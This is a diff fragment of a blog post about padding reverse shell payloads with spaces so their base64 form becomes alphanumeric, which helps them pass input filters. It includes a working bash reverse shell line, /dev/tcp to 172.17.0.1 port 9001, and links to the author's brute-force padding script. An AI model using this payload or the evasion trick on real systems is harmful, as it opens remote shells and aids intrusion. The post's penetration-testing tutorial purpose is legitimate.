nicholas-long/blog/content/posts/script-to-optimize-alphanumeric-base64-for-reverse-shell-payloads.md

 bash -i  >& /dev/tcp/172.17.0.1/9001  0>&1
 ```
 As you can see, spaces have been inserted in two locations in order to move the characters around to specific locations.
+How can this easily be done?

 ## The Algorithm

-How can this be done?
 The easiest algorithm to implement is to just start trying all possibilities of spaces inserted until one converts to alphanumeric base64.
 I have [implemented such an algorithm in bash and awk](https://github.com/nicholas-long/environment/blob/main/zet/20230906035744/README.md).
 I use this script within the [shortcut command in my environment for creating reverse shell snippets](https://github.com/nicholas-long/environment/blob/main/zet/20230906035650/README.md)